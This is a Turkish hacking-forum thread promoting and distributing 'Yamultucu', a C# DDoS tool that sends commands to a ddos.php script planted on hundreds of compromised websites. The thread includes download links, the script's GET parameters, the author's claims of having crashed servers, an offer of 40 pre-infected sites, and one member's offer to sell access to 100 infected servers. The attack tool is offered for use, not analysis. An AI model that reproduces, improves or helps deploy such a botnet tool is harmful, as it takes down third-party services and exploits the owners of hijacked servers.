Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
Yakın süreçde açılan imhatimi.org sonrasında ilk hacktools projemizi tamamladık. Programın yaptığı iş aslında ücretli olan stresser panelleri ile aynıdır, nekadar çok siteye ddos.php yüklerseniz saldırı gücünüz okadar artmaktadır. 20-30 siteye yüklediğiniz ddos.php bir işe yaramaz bunuda unutmayın, 300-400 siteye yüklerseniz birçok siteyi kapatabilirsiniz ezer geçersiniz ..

PROGRAM ÖZELLİKLERİ
C# ile kodlanmıştır
Multithread ile seri ve cpu yormayan işlem
Eşzamanlı istek (tüm urllere)
Saldırı süresi bittiği anda beklemeye geçer.

yamultucu3-jpg.8

Yazılımda lisans sistemi vardır ve her lisans 2 sene gibi bir süreyle ücretsiz olarak sağlanacaktır. Programı indirdikten sonra karşınıza şöyle bir lisans sorgulama ekranı gelecektir.

3e9435ce6f2.png

Sistem No kısmını lisans talep ederken kullanacaksınız, bunu yapmamızdaki amaç ise programın sadece sizin bilgisayarınızda çalışmasını sağlamak, lisans tek bilgisayar için geçerli olacaktır.

ddos.php (bu dosyada değişiklikler yapabilirsiniz, saldırıyı arttıracak şekilde kişisel modifikasyonlarınızı yapabilirsiniz.
ddos.php mümkğn oldukça çok siteye yükleyin

site1.com/ddos.php
site2.com/ddos.php
site3.com/ddos.php
site4
site5

bu böyle 100-200-300 siteye kadar gitmeli, yani nekadar fazla siteye ddos.php yüklerseniz saldırı okadar sağlam olacaktır, program sunucuların networkünü kullanır.
Alttaki görseldeki gibi.

b002e2f2121.png

DDOS.PHP EK OLARAK YÜKLENMİŞTİR VE KODLAR GÜNCELLENDİ.

ddos.php 'de değişim yapacaksanız veya baştan sona değişecekseniz uymanız gereken 4 _post parametresi vardır, bu parametreler değişmediği sürece program uzun seneler tarafınızdan kullanılır ve çalışır.

_POST PARAMETRELERİ
PHP:
$site = $_GET['site'];
$sayfa = $_GET['sayfa'];
$port = $_GET['port'];
$exec_time = $_GET['time'];

Yamultucu download
https://mega.nz/#!5YghESQa!EZnGDFoCJIbDJgM46R-p6ONOxn6lstzGIsEFjgtoZ1M
https://dosya.co/w2sq0skn93dx/Yamultucu_v1.0_Latest_build.zip.html
https://www.dosya.tc/server20/exdq3i/Yamultucu_v1.0_Latest_build.zip.html

Ziyaretçiler için download linki
Code:
https://mega.nz/#!5YghESQa!EZnGDFoCJIbDJgM46R-p6ONOxn6lstzGIsEFjgtoZ1M
Programı indirdikten sonra lisans talep etmek için konu altından yazabilirsiniz.

Programı kullandıktan sonra önerilerinizi yine konu altında yapabilirsiniz 2. versiyonu için dikkate alınacaktır ve program geliştirilmeye devam edecektir.

Attachments

• ddos.txt
    1.6 KB · Views: 15
Last edited:
Credits
101
Rating - 0%
Elinize sağlık hocam ben bu hakkımı imhatimi üyeliğinde kullanabilirmiyim ? özelden yazamadım permden kaynaklı

Credits
5,066
Rating - 0%
Programı komple x0rz isimli imtli arkadaşımız kodlamıştır ben sadece ddos.php kısmını yaptım ve birkaç fikir yürüttüm böyle birşey çıktı ortaya.

Teşekkürler kardesim.
anladım abi bende şuan tool yazıyorum inşAllah bitince paylaşacağım github üzerinden

Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
Konu güncellenmiştir ve yeni bir açıklama eklenmiştir.

Elinde 100 ve üzeri shell olan arkadaşlar için sağlam bir ddos programıdır, sizde böyle bir liste yok ise pek işinize yaramaz arkadaşlar.

D

Deleted member 11195

Elinize sağlık güzel iş çıkarmışsınız. Kullanacak olacak arkadaşlar lütfen spy'a ddos atmasın :)

Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
ddos.php güncellenmiştir, Saldırı başladıktan sonra bağlantı kısa sürede kopuyordu bu hata düzeltildi ve birkez komut gittiği vakit arkplanda saldırı devam etmesi sağlandı.

Sadece 35 adet ddos.php ile Load 30 seviyelerine kadar tırmanmıştır :) buda Yamultucunun gücünü gösterir.

Attachments

• ddos.txt
    1.6 KB · Views: 3
B

blackdewil

sistemin aynısını php ile yazmıştım desktop app ile ugrasmayayim diye , sizinki de guzel olmus. elinize saglik :)

Mectruy 

Not Gonna Get Us
Credits
201,695
Rating - 94.7%
Programı kullanacak arkadaşlara 40 ddos.php yüklenmiş site verilecektir, bot sayısını arttırmak artık size kalmış. Sıfırdan site kasmanın zor olduğunu biliyorum.

Programı uzak masa üstünde veya sanal makinede çalıştırabilirsiniz.

C

Crysuder

Program çok güzel olmuş elinize sağlık. 500-600 adet sunucuya yüklendiğinde hemen hemen her alt yapıyı uçurta bilecek güce sahip olabilirsiniz.100 adet farklı sunucuya yüklenmiş ddos.php scriptini 250 tl. Sata bilirim.

Users who are viewing this thread